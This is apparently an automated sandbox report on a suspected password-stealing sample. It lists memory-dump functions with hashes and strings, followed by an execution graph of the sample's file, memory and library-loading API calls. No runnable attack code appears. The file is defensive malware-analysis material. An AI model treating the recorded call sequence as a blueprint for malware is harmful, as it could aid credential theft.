                            Function 014F2FA0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e220690c38555ec95755d6a7417082c4030c15f412ebb94765bb096ae585a171
                            • Instruction ID: 2f1f241384e9911471bfe7e347d9673f1544a4148979b7de212be637eb8f8978
                            • Opcode Fuzzy Hash: e220690c38555ec95755d6a7417082c4030c15f412ebb94765bb096ae585a171
                            • Instruction Fuzzy Hash: 2D900231601C0442D10171984808B470045A7D0312F59C411A5164999EC6A5C9D16631
                            Function 014F2FB0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c3743fb3343330c1fb3ed3e51ab48ceac68adf128ad3e2ee0eb3e9ce144f88c
                            • Instruction ID: 9cf682f779a343683605a4eb31cb516e7728a3e0cc0b622166e57350ce669332
                            • Opcode Fuzzy Hash: 7c3743fb3343330c1fb3ed3e51ab48ceac68adf128ad3e2ee0eb3e9ce144f88c
                            • Instruction Fuzzy Hash: A1900221A0180082414171A88844D064045BBE1221759C521A0998994DC59989A55765
                            Function 014F2E30 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6bcb08eba592a800384ea9ea9318260b01d813eabc40b1bb4b4111a89685b2a
                            • Instruction ID: 31cf1192c2297f16d140c9654cb8653a0cedb80ff5ddbe287452ee176b69720f
                            • Opcode Fuzzy Hash: e6bcb08eba592a800384ea9ea9318260b01d813eabc40b1bb4b4111a89685b2a
                            • Instruction Fuzzy Hash: CD90022170180442D10371984414A060049E7D1355F99C412E1424999DC6658A93A232
                            Function 014F2EE0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68ff36f7c4cfb43cec092ff8c3554c0e0ac7689c10b7add11439acd89cd86c43
                            • Instruction ID: fc9b1edb4dced70954e85db28c12b55880a397aaf4b08002f7d456b8937539f2
                            • Opcode Fuzzy Hash: 68ff36f7c4cfb43cec092ff8c3554c0e0ac7689c10b7add11439acd89cd86c43
                            • Instruction Fuzzy Hash: 45900261601C0443D14175984804A070045A7D0312F59C411A2064999ECA698D916235
                            Function 014F2E80 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a38bba784c14c8720bcfd95417bcadfa48a58ef2d3e7bf81f085d3ab134ec5da
                            • Instruction ID: 7429217302594c32898772c2269a0ace5a995b1cb43b9eb1d247334657784146
                            • Opcode Fuzzy Hash: a38bba784c14c8720bcfd95417bcadfa48a58ef2d3e7bf81f085d3ab134ec5da
                            • Instruction Fuzzy Hash: 64900221A0180542D10271984404A16004AA7D0251F99C422A1024999ECA658AD2A231
                            Function 014F2EA0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 60d9d9cc66d90afba6763109dd78303276eeac863d17e2a9f7d2fb6863cbff3e
                            • Instruction ID: 62bd9d969c855874343e63f5a01766b932a767e9e37a96afd1660431aa9ca531
                            • Opcode Fuzzy Hash: 60d9d9cc66d90afba6763109dd78303276eeac863d17e2a9f7d2fb6863cbff3e
                            • Instruction Fuzzy Hash: 2090027160180442D14171984404B460045A7D0311F59C411A5064998EC6998ED56765
                            Function 014F3010 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 835633eb8e3c905e7cd6b103bff874252c1ec442b8d7994bd80cb6ba861e34d9
                            • Instruction ID: b57f3e80525cfdb8a71f4ff340b8c4fe7a71e99daa9d0ad656378f1dd9dc9fbb
                            • Opcode Fuzzy Hash: 835633eb8e3c905e7cd6b103bff874252c1ec442b8d7994bd80cb6ba861e34d9
                            • Instruction Fuzzy Hash: E1900221601C4482D14172984804F0F4145A7E1212F99C419A4156998CC95589955721
                            Function 014F3090 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4737b2897b9898c57e05fd76c7a8300e321e381ca90e1c94f45704a28693b8d6
                            • Instruction ID: c53481cec8f3d83c4cc39c4fa858dfd2612853bf2ff2bd1f648bea9451773198
                            • Opcode Fuzzy Hash: 4737b2897b9898c57e05fd76c7a8300e321e381ca90e1c94f45704a28693b8d6
                            • Instruction Fuzzy Hash: 2C90022164180842D14171988414B070046E7D0611F59C411A0024998DC6568AA567B1
                            Function 014F39B0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8f1be3a955ca1fd3173cf8ab1a812ce8835a41a27e57bae2745946f360caf0cc
                            • Instruction ID: 3bb6ec5545276ae7bdab98b09c3dbf42d9e78258de08874dac8966c940bfc4d3
                            • Opcode Fuzzy Hash: 8f1be3a955ca1fd3173cf8ab1a812ce8835a41a27e57bae2745946f360caf0cc
                            • Instruction Fuzzy Hash: 9190022164585142D151719C4404A164045B7E0211F59C421A08149D8DC59589956321
                            Function 014F3D70 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 73e31e18142d9e8256e529cfce73989cd9624c10fb1c8549fd771cd9836d5981
                            • Instruction ID: 91f19905c28d406522afb9f501e70c97b6b8810d4037aa574b7daaccbcd3db88
                            • Opcode Fuzzy Hash: 73e31e18142d9e8256e529cfce73989cd9624c10fb1c8549fd771cd9836d5981
                            • Instruction Fuzzy Hash: FF90023560180442D51171985804A460086A7D0311F59D811A042499CDC69489E1A221
                            Function 014F3D10 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 187cc0db8c45f4859ec37d58be17dc050993906c4e2fb4fabb13c72a70c40817
                            • Instruction ID: e5821aedf65fee8c9afb0befb037f506d7266fb707ec6695011f69e9bff85ed2
                            • Opcode Fuzzy Hash: 187cc0db8c45f4859ec37d58be17dc050993906c4e2fb4fabb13c72a70c40817
                            • Instruction Fuzzy Hash: 8190023160280182954172985804E4E4145A7E1312B99D815A0015998CC95489A15321
                            Function 014F2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction ID: 34f0b348e126488d994b67bc5b3da795d643cc88cece7f49ebb3fccfbcc69ea9
                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction Fuzzy Hash:
                            Function 014F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 8cb58ae36c389fda112de1c0487296c242cb0f93eb284a1f645ef3aa1a92005d
                            • Instruction ID: d3c2ba5a77a40be6948851ecfdb94f2dc33f835cc05b00b1a033a1f58e3157fa
                            • Opcode Fuzzy Hash: 8cb58ae36c389fda112de1c0487296c242cb0f93eb284a1f645ef3aa1a92005d
                            • Instruction Fuzzy Hash: 3E51D6B6B00156AFCB11DF9C8890D7FFBB8BB49240B54822EE565DB791D374DE408BA0
                            Function 01562410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 0dd145f8515c7e12a991bf6fb77c7ab9ad949f69e057ae335856cc40b1f0be0d
                            • Instruction ID: af9735f252f40c18883910cc00d831516e083ed05fb6a3eb18779a9a4b370e81
                            • Opcode Fuzzy Hash: 0dd145f8515c7e12a991bf6fb77c7ab9ad949f69e057ae335856cc40b1f0be0d
                            • Instruction Fuzzy Hash: C251F775A00646AECB31DE9DC89097EBBFCFB54201F44885AE4D6CF681E674DA40C7A0
                            Function 014E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                            Download Yara Rule
                            Strings
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01524787
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01524725
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01524742
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01524655
                            • Execute=1, xrefs: 01524713
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015246FC
                            • ExecuteOptions, xrefs: 015246A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: e031665d6c0a6f22fff11dd8fd5e5f73d9b7fc13e8fb9212d19e3f3aa80bb33c
                            • Instruction ID: 3c81ae2e1eb1790112a6d0e8b4d6b63b9bcb5a7fa4e3175ed48ad1293abedc4f
                            • Opcode Fuzzy Hash: e031665d6c0a6f22fff11dd8fd5e5f73d9b7fc13e8fb9212d19e3f3aa80bb33c
                            • Instruction Fuzzy Hash: FD51613164021A6BEF109BA5DC49FAE3BE8FF54726F1400DFD605AB2E1D770AA458F90
                            Function 01586940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                            • Instruction ID: 0922ccd656dc97d6c4567f2a1a59c87ce9bf44ccdba1798cec67eccd703b2f3a
                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                            • Instruction Fuzzy Hash: 2D022571508342AFD305EF19C490A6FBBE5FFC8704F14892DBA996B260DB31E905CB52
                            Function 014FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                            • Instruction ID: fefcd66e304a1b4c5ba07b7cfc612c00415cfdd2527ea9bcc3fc1974a3f87018
                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                            • Instruction Fuzzy Hash: BE81AF70E052499EEF258E6CC8917FFBBB2EF86360F18411FDA55A73B1C63498418B52
                            Function 015620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$[$]:%u
                            • API String ID: 48624451-2819853543
                            • Opcode ID: 766493f858d674b2b55b935574e4fa89cf6c008a36a4fdcc06852e54be71eecb
                            • Instruction ID: 3e91e9185f2bd7425d7e93a3a08fd708a0434c2885941d488464c6491e7e6d09
                            • Opcode Fuzzy Hash: 766493f858d674b2b55b935574e4fa89cf6c008a36a4fdcc06852e54be71eecb
                            • Instruction Fuzzy Hash: D121317AE0011AEBDB11DF69D850AEEBBECBF54654F45011AEA05E7240EB30DA058BE1
                            Function 014DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015202BD
                            • RTL: Re-Waiting, xrefs: 0152031E
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015202E7
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: 9069bdf1d4a676605b4a0ba061e5f91248b87466552895f3ac507965394e31ec
                            • Instruction ID: a7b676b1b46112adb116dabd2d80170ab283bdd01802f43bc8f5517f507db6e2
                            • Opcode Fuzzy Hash: 9069bdf1d4a676605b4a0ba061e5f91248b87466552895f3ac507965394e31ec
                            • Instruction Fuzzy Hash: E4E1BE316047429FDB25CF28C894B6ABBE0BB85314F140A5EF5A6CB3E1D774D84ACB42
                            Function 014EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Resource at %p, xrefs: 01527B8E
                            • RTL: Re-Waiting, xrefs: 01527BAC
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01527B7F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: dde6b0b0c892237afa50639c2540c13e244a1c372f50ea70ba8f2acff3c4c431
                            • Instruction ID: ad8000aa0c52cba3a1ca790287dce079d8f03364276ebc0a3d23b1e523111318
                            • Opcode Fuzzy Hash: dde6b0b0c892237afa50639c2540c13e244a1c372f50ea70ba8f2acff3c4c431
                            • Instruction Fuzzy Hash: AF41E2317007039BD720DE29C850B2BB7E5FB99711F100A1EEA56DB3A0DB31E8058B91
                            Function 014EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0152728C
                            Strings
                            • RTL: Resource at %p, xrefs: 015272A3
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01527294
                            • RTL: Re-Waiting, xrefs: 015272C1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 56732d6f3d2b0b36098a7f6b6c42733e9a8389f304dabb1a3e3dcaeebee3cc78
                            • Instruction ID: 944607635700f4158d605b621c564fdf9f1f800a107b108f4c4b29b283a83ea7
                            • Opcode Fuzzy Hash: 56732d6f3d2b0b36098a7f6b6c42733e9a8389f304dabb1a3e3dcaeebee3cc78
                            • Instruction Fuzzy Hash: 2241E132600617ABD721DE29CC41F6AB7E5FBAA711F10062AF955DB290DB30F85287D1
                            Function 01562300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$]:%u
                            • API String ID: 48624451-3050659472
                            • Opcode ID: 9bce1c3ea4d487d492107dea419da31317ac827ddc3a0647cd48cbcc34f90929
                            • Instruction ID: b33178d252561b895bf1b146caac943997a88dceee2c1ea07ee4d9c4eb353f7f
                            • Opcode Fuzzy Hash: 9bce1c3ea4d487d492107dea419da31317ac827ddc3a0647cd48cbcc34f90929
                            • Instruction Fuzzy Hash: 57316172A002199FDB20DF2DCC40BEEB7FCFB54650F95455AE949E7240EB30AA448BA0
                            Function 014F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                            • Instruction ID: 5afee909056e5b504eead4e51bd933a585419e806968eb9dc7166c049ac7cd74
                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                            • Instruction Fuzzy Hash: B3919371E002069AEB24DF6DC890ABFBBA5EF44322F54451FEB55A73E0D73899418721
                            Function 014B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: 5b90d68b264caf28eebc06ef576c7549b6f99290ea4b168d182155c963b66732
                            • Instruction ID: ce1693a603c99e9a5c578ed15ee3ebfb3e88d04b99bccb7918cd1e471104fe19
                            • Opcode Fuzzy Hash: 5b90d68b264caf28eebc06ef576c7549b6f99290ea4b168d182155c963b66732
                            • Instruction Fuzzy Hash: CF812B71D002699BEB35CB54CC44BEEB6B4AF08714F1445DAEA19BB290D7309E84DFA0

                            Execution Graph

                            Execution Coverage:2.6%
                            Dynamic/Decrypted Code Coverage:4.1%
                            Signature Coverage:1.5%
                            Total number of Nodes:469
                            Total number of Limit Nodes:77
                            execution_graph 96038 322bf20 96040 322bf49 96038->96040 96039 322c04d 96040->96039 96041 322bff3 FindFirstFileW 96040->96041 96041->96039 96042 322c00e 96041->96042 96043 322c034 FindNextFileW 96042->96043 96043->96042 96044 322c046 FindClose 96043->96044 96044->96039 96047 322f8e0 96048 322f8fd 96047->96048 96053 32244e0 96048->96053 96050 322f91b 96052 322fa9a 96050->96052 96060 3235e80 96050->96060 96055 3224504 96053->96055 96054 322450b 96054->96050 96055->96054 96057 322452a 96055->96057 96065 323b490 LdrLoadDll 96055->96065 96058 3224557 96057->96058 96059 3224551 LdrLoadDll 96057->96059 96058->96050 96059->96058 96061 3235edd 96060->96061 96062 3235f10 96061->96062 96066 322fbb6 RtlFreeHeap 96061->96066 96062->96052 96064 3235ef2 96064->96052 96065->96057 96066->96064 96072 32375e0 96073 3237664 96072->96073 96075 3237604 96072->96075 96077 3a22ee0 LdrInitializeThunk 96073->96077 96074 3237695 96077->96074 96078 3237e20 96079 3237ecc 96078->96079 96081 3237e48 96078->96081 96080 3237ee2 NtCreateFile 96079->96080 96082 3238060 96083 32380c9 96082->96083 96085 3238081 96082->96085 96084 32380df NtDeleteFile 96083->96084 96086 3230ee0 96087 3230efc 96086->96087 96088 3230f24 96087->96088 96089 3230f38 96087->96089 96090 32380f0 NtClose 96088->96090 96096 32380f0 96089->96096 96092 3230f2d 96090->96092 96093 3230f41 96099 323a0f0 RtlAllocateHeap 96093->96099 96095 3230f4c 96097 323810d 96096->96097 96098 323811e NtClose 96097->96098 96098->96093 96099->96095 96100 322a7b2 96101 322a7b7 96100->96101 96102 322a788 96100->96102 96107 322a82f 96101->96107 96146 323a0b0 96101->96146 96121 322a4b0 96102->96121 96104 322a78d 96135 322a150 96104->96135 96106 322a7a9 96109 322a850 96110 323a0b0 RtlAllocateHeap 96109->96110 96111 322a861 96110->96111 96111->96107 96112 32244e0 2 API calls 96111->96112 96114 322a8af 96112->96114 96113 322a9df 96114->96113 96115 32244e0 2 API calls 96114->96115 96116 322a95a 96115->96116 96116->96113 96149 3239fd0 96116->96149 96119 3239fd0 RtlFreeHeap 96120 322a9d0 96119->96120 96122 322a4d5 96121->96122 96152 3227e30 96122->96152 96125 322a612 96125->96104 96127 322a629 96127->96104 96128 322a620 96128->96127 96130 322a711 96128->96130 96167 3229bb0 96128->96167 96132 322a769 96130->96132 96176 3229f10 96130->96176 96133 3239fd0 RtlFreeHeap 96132->96133 96134 322a770 96133->96134 96134->96104 96136 322a166 96135->96136 96139 322a171 96135->96139 96137 323a0b0 RtlAllocateHeap 96136->96137 96136->96139 96137->96139 96138 322a187 96138->96106 96139->96138 96140 3227e30 GetFileAttributesW 96139->96140 96141 322a47e 96139->96141 96144 3229bb0 RtlFreeHeap 96139->96144 96145 3229f10 RtlFreeHeap 96139->96145 96140->96139 96142 322a497 96141->96142 96143 3239fd0 RtlFreeHeap 96141->96143 96142->96106 96143->96142 96144->96139 96145->96139 96194 3238400 96146->96194 96148 323a0cb 96148->96109 96197 3238450 96149->96197 96151 322a9c3 96151->96119 96153 3227e51 96152->96153 96154 3227e58 GetFileAttributesW 96153->96154 96155 3227e63 96153->96155 96154->96155 96155->96125 96156 3232540 96155->96156 96157 323254e 96156->96157 96158 3232555 96156->96158 96157->96128 96159 32244e0 2 API calls 96158->96159 96160 323258a 96159->96160 96161 3232599 96160->96161 96180 3232010 LdrLoadDll LdrLoadDll 96160->96180 96163 323a0b0 RtlAllocateHeap 96161->96163 96166 3232731 96161->96166 96165 32325b2 96163->96165 96164 3239fd0 RtlFreeHeap 96164->96166 96165->96164 96165->96166 96166->96128 96168 3229bd6 96167->96168 96181 322d3f0 96168->96181 96170 3229c3d 96171 3229c5b 96170->96171 96173 3229dc0 96170->96173 96172 3229da5 96171->96172 96186 3229a70 96171->96186 96172->96128 96173->96172 96174 3229a70 RtlFreeHeap 96173->96174 96174->96173 96177 3229f36 96176->96177 96178 322d3f0 RtlFreeHeap 96177->96178 96179 3229fb2 96178->96179 96179->96130 96180->96161 96183 322d406 96181->96183 96182 322d413 96182->96170 96183->96182 96184 3239fd0 RtlFreeHeap 96183->96184 96185 322d44c 96184->96185 96185->96170 96187 3229a86 96186->96187 96190 322d460 96187->96190 96189 3229b8c 96189->96171 96192 322d484 96190->96192 96191 322d51c 96191->96189 96192->96191 96193 3239fd0 RtlFreeHeap 96192->96193 96193->96191 96195 323841d 96194->96195 96196 323842e RtlAllocateHeap 96195->96196 96196->96148 96198 323846a 96197->96198 96199 323847b RtlFreeHeap 96198->96199 96199->96151 96200 321b4b0 96203 3239f40 96200->96203 96202 321cb21 96206 3238240 96203->96206 96205 3239f71 96205->96202 96207 32382ca 96206->96207 96209 3238264 96206->96209 96208 32382e0 NtAllocateVirtualMemory 96207->96208 96208->96205 96209->96205 96211 3226ab0 96212 3226ada 96211->96212 96215 3227a10 96212->96215 96214 3226b04 96216 3227a2d 96215->96216 96222 3237880 96216->96222 96218 3227a7d 96219 3227a84 96218->96219 96227 3237950 96218->96227 96219->96214 96221 3227aad 96221->96214 96223 3237910 96222->96223 96225 32378a4 96222->96225 96232 3a22f30 LdrInitializeThunk 96223->96232 96224 3237949 96224->96218 96225->96218 96228 32379f2 96227->96228 96230 3237974 96227->96230 96233 3a22d10 LdrInitializeThunk 96228->96233 96229 3237a37 96229->96221 96230->96221 96232->96224 96233->96229 96239 3231270 96243 323127f 96239->96243 96240 32312c6 96241 3239fd0 RtlFreeHeap 96240->96241 96242 32312d6 96241->96242 96243->96240 96244 3231307 96243->96244 96246 323130c 96243->96246 96245 3239fd0 RtlFreeHeap 96244->96245 96245->96246 96247 32348f0 96248 323494a 96247->96248 96250 3234957 96248->96250 96251 32270d0 96248->96251 96252 32270a9 96251->96252 